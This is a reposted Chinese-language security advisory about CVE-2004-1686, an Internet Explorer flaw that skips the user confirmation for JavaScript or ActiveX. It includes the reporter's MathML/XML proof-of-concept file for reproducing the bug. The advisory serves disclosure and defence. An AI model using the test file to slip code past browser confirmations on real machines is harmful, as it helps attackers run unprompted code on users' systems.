Microsoft Internet Explorer用户安全确认绕过漏…

2008-04-09 04:19:43来源：互联网阅读 ()

Microsoft Internet Explorer用户安全确认绕过漏洞

发布日期：2004-09-16
更新日期：2004-09-23

受影响系统：

Microsoft Internet Explorer 6.0SP2
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000 Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Advanced Server SP4

描述：

BUGTRAQ ID: 11200
CVE(CAN) ID: CVE-2004-1686

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer存在设计错误，远程攻击者可以利用这个漏洞绕过部分确认验证信息。

攻击者可以构建包含恶意页面的网站，当用户解析执行一些JavaScript或者ActiveX对象时，不提示应有的确认信息，导致某些恶意代码不被用户重视的情况下被执行。

<*来源：cns （cns@free.fr）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=109539520310153&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

cns （cns@free.fr）提供了如下测试方法：

安装DesignScience，粘贴如下文本到文件中，并赋予.xml扩展名，打开IE，并没有第四行的注释：

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0//EN"
"http://www.w3.org/TR/MathML2/dtd/xhtml-math11-f.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>IE Vulnerability example</TITLE>
<BODY>
<math displaystyle="true" xmlns="&mathml;">
<mfrac>
<mn>27</mn>
<mn>12</mn>
</mfrac>
</math>
</BODY></HTML>

建议：

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有